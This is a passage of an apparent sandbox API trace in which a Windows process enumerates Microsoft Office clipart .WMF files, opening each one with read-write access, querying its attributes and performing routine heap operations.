[0101.189] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.189] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8aeb0 [0101.189] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x8aeb0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01173_.WMF") returned 69 [0101.189] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01173_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01173_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0101.189] GetFileType (hFile=0x33c) returned 0x1 [0101.189] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0101.189] CloseHandle (hObject=0x33c) returned 1 [0101.189] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.189] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.189] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0101.189] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.189] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0101.189] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.189] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.189] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0101.189] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0101.189] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0101.190] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0101.190] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0101.190] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0101.190] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.190] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0101.190] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0101.190] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.190] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.190] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.190] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.190] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.190] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.190] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.190] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.190] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.190] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.190] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.190] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.190] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.190] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.190] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.190] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.190] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.190] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.190] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.190] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.190] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.190] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.190] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.190] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.190] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.190] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.190] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.191] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.191] AreFileApisANSI () returned 1 [0101.191] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.191] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a660 [0101.191] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x8a660, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01173_.WMF") returned 69 [0101.191] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01173_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01173_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc3d96c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcc3d96c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcc3d96c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x66dc)) returned 1 [0101.191] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a660 | out: hHeap=0x20000) returned 1 [0101.191] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0101.191] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0101.191] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d6e0 | out: hHeap=0x20000) returned 1 [0101.191] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.191] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.191] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbf13fd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbf13fd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcc3d96c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6cd2, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AN01174_.WMF", cAlternateFileName="")) returned 1 [0101.191] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.191] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.191] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.191] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0101.191] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.191] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.191] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.191] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0101.191] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0101.191] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0101.191] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0101.191] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0101.191] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0101.191] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35010 [0101.191] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0101.191] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35010 | out: hHeap=0x20000) returned 1 [0101.191] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0101.191] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0101.192] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.192] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f9a8 [0101.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0101.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.192] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ac50 [0101.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f9a8 | out: hHeap=0x20000) returned 1 [0101.192] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.192] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.192] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.192] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ac50 | out: hHeap=0x20000) returned 1 [0101.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0101.192] AreFileApisANSI () returned 1 [0101.192] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01174_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01174_.WMF", lpUsedDefaultChar=0x0) returned 69 [0101.192] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0101.192] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.192] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.192] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0101.192] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0101.192] AreFileApisANSI () returned 1 [0101.192] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.192] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a530 [0101.192] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x8a530, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01174_.WMF") returned 69 [0101.192] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01174_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01174_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0101.193] GetFileType (hFile=0x33c) returned 0x1 [0101.193] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0101.193] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0101.193] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0101.193] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0101.193] CloseHandle (hObject=0x33c) returned 1 [0101.194] AreFileApisANSI () returned 1 [0101.194] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.194] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a498 [0101.194] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x8a498, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01174_.WMF") returned 69 [0101.194] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01174_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01174_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0101.194] GetFileType (hFile=0x33c) returned 0x1 [0101.194] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a498 | out: hHeap=0x20000) returned 1 [0101.194] CloseHandle (hObject=0x33c) returned 1 [0101.194] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.194] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0101.194] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.194] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.194] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.194] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0101.194] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.194] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0101.194] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0101.194] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0101.194] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0101.194] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0101.194] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0101.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0101.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0101.195] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.195] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.195] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.195] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.195] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.195] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.195] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.195] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.195] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.195] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.195] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0101.195] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0101.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.195] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.195] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.195] AreFileApisANSI () returned 1 [0101.195] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a958 [0101.196] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x8a958, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01174_.WMF") returned 69 [0101.196] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01174_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01174_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbf13fd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbf13fd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcc3d96c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6cd2)) returned 1 [0101.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a958 | out: hHeap=0x20000) returned 1 [0101.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0101.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0101.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0101.196] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.196] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.196] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbf13fd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbf13fd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcbf13fd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xea2, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AN01184_.WMF", cAlternateFileName="")) returned 1 [0101.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0101.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34eb0 [0101.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0101.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34eb0 | out: hHeap=0x20000) returned 1 [0101.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0101.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0101.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0101.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0101.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0101.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60138 [0101.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0101.197] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.197] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ad80 [0101.197] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60138 | out: hHeap=0x20000) returned 1 [0101.197] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.197] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.197] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.197] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.197] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ad80 | out: hHeap=0x20000) returned 1 [0101.197] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.197] AreFileApisANSI () returned 1 [0101.197] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01184_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, 